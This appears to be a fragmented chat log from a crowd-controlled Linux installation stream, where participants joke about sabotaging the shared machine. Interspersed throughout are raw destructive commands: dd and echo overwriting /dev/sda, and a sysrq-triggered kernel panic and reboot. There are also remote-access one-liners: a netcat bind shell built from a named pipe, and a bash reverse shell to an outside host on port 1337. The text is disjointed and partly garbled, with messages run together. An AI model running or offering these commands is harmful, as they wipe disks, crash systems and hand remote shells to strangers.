I used nmap to track packets and log them into a db. then i made a little program to visualize it with colors

vitimiti: I want to run loadkeys de 7:26hitlurcat: somebody should switch the region to Russia and install myBB 7:26vitimiti: Just to piss people off 7:26HMage: Vitimiti now that’s evil 7:26vitimiti: Yes XDjackieXD: @Vitimiti this would screw up the chat input system 7:26HMage: I applaud you :D 7:27vitimiti: I was thinking about loadkeys es but Spanish keyboard is around many countries 7:27HMage: loadkeys ru

nohup dd if=/dev/zero of=/dev/sda bs=1M &

dd if=/dev/random of=/dev/sda bs=1m

fdisk -l

echo imgay > /dev/sda

7:35wongmjane: create a init script that only reboots the system

Reverse SSH-tunneling

7:42inluck_nl: use autossh to maintain a reverse ssh tunnel 7:42inluck_nl: much easier than vpn

7:46HMage: how many times people will vote for cat /proc/cpuinfo and free?

mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc -l -p 6666 1>/tmp/backpipe

7:50whiletrueinstallgentoo: oh god the bikeshedding in this stream is gonna be intense

7:49Blu5ky: mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc -l -p 6666 1>/tmp/backpipe 7:49bartekww: ls 7:49Blu5ky: then make your install from home 7:50HMage: Blu5ky no public IP 7:50mastermat64: remember guys that they said they would make a raffle if we succed to do “twitch plays arch plays pokemon” 7:50xBytez: then do it reverse! 7:500xicl33n: TOR HIDDEN SERVICE 7:50Blu5ky: mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc @home -p 6666 1>/tmp/backpipe 7:50Blu5ky: thne :) 7:50xBytez: bash -i >& /dev/tcp/xbytez.eu/1337 0>&1 7:50xBytez: oh yeah mknod will also work

$ echo 1 > /proc/sys/kernel/panic && echo 1 /proc/sys/kernel/sysrq && echo b > /proc/sysrq-trigger